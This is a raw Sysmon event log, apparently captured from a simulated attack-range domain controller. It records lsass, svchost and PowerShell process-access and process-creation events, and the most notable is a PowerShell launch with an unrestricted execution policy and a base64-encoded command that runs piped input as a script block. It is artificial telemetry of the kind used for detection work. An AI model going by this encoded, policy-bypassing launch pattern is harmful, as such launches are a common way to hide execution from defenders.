JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.827{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.827{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.827{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.780{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.780{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.749{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ldzbf0ab.bqf.ps12020-10-09 10:39:15.749 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.733{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.702{733EE690-3DD3-5F80-FA02-000000007E01}38403512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+695d331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a741a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a73e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+695254db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a34a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a92edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a76540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a76540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a763d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a68356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a74889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a7447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a741a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a73e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+695254db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a5acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a5a2a7(wow64) 154100x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.713{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 